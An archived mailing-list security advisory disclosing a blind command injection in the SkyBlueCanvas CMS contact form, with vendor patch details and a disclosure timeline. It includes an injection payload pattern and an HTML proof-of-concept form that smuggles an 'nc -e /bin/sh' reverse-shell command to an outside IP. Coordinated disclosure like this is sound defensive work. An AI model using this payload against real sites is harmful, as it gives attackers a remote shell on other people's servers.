[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Remote Command Injection Vulnerability in SkyBlueCanvas CMS

To: "'full-disclosure@xxxxxxxxxxxxxxxxx'" <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] Remote Command Injection Vulnerability in SkyBlueCanvas CMS
From: Scott Parish <Scott.Parish@xxxxxxxxxxxxxx>
Date: Thu, 23 Jan 2014 20:44:54 +0000

Vulnerability in SkyBlueCanvas CMS

Vulnerability Type:
Remote Command Injection

Version Affected:
1.1 r248-03 (and probably prior versions)

Discovered by:
Scott Parish - Center for Internet Security

Vendor Information:
SkyBlueCanvas is an easy-to-use Web Content Management System, that makes it 
simple to keep the content of your site fresh. You simply upload the software 
to your web server, and you are ready to start adding text and pictures to your 
web site.

Vulnerability Details:
The SkyBlueCanvas Lightweight CMS application contains a remote command 
injection vulnerability within the form on the Contact page. A remote 
un-authenticated user can exploit this vulnerability to force the webserver to 
execute commands in the context of the vulnerable application. It is possible 
to exploit this vulnerability because the POST parameters "name", "email", 
"subject", and  "message" are not properly sanitized when submitted to the 
index.php?pid=4 page. Arbitrary commands can be executed by injecting the 
following payload to a vulnerable parameter:
A"; <command>
Since the page does not display the results of the injected command (blind 
injection) then testing must be done using a ping, nc, or similar command.

Proof of Concept Exploit Code:
<html>
<body>
<form action="http://localhost/index.php?pid=4"; method="post">
  <input type="hidden" name="cid" value="3">
  <input type="hidden" name="name" value="test&#34;&#59; nc -e /bin/sh 
192.168.1.2 12345">
  <input type="hidden" name="email" value="test">
  <input type="hidden" name="subject" value="test">
  <input type="hidden" name="message" value="test">
  <input type="hidden" name="action" value="Send">
  <input type="submit" value="submit">
</form>
</body>
</html>

References:
http://skybluecanvas.com/

Remediation:
The vendor has issued a fix to the vulnerability in version 1.1 r248-04

Revision History:
1/9/14 - Vulnerability discovered
1/10/14 - Vulnerability disclosed privately to vendor
1/22/14 - Patch released by vendor
1/23/14 - Vulnerability disclosed publicly
This message and attachments may contain confidential information. If it 
appears that this message was sent to you by mistake, any retention, 
dissemination, distribution or copying of this message and attachments is 
strictly prohibited. Please notify the sender immediately and permanently 
delete the message and any attachments.

. . .

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] Contact PSIRT Fortinet
Next by Date: [Full-disclosure] [SECURITY] [DSA 2826-2] denyhosts regression update
Previous by thread: [Full-disclosure] Contact PSIRT Fortinet
Next by thread: [Full-disclosure] [SECURITY] [DSA 2826-2] denyhosts regression update
Index(es):
- Date
- Thread